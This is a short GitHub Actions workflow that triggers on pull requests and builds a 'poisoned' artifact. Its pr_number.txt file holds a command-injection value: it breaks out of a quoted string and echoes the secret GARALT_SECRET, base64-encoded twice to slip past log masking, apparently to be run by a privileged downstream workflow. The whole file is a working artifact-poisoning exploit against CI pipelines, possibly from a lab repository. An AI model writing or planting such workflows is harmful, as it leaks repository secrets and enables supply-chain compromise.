name: Pull Request / Packages
on:
  pull_request:
    types: [opened, synchronize, reopened, ready_for_review]
jobs:
  upload_pr_workflow_payload:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare poisoned data
        run: |
          mkdir pr_workflow_payload
          echo '1"; echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)"; #' > pr_workflow_payload/pr_number.txt
      - name: Upload
        uses: actions/upload-artifact@v7
        with:
          name: pr_workflow_payload
          path: pr_workflow_payload/
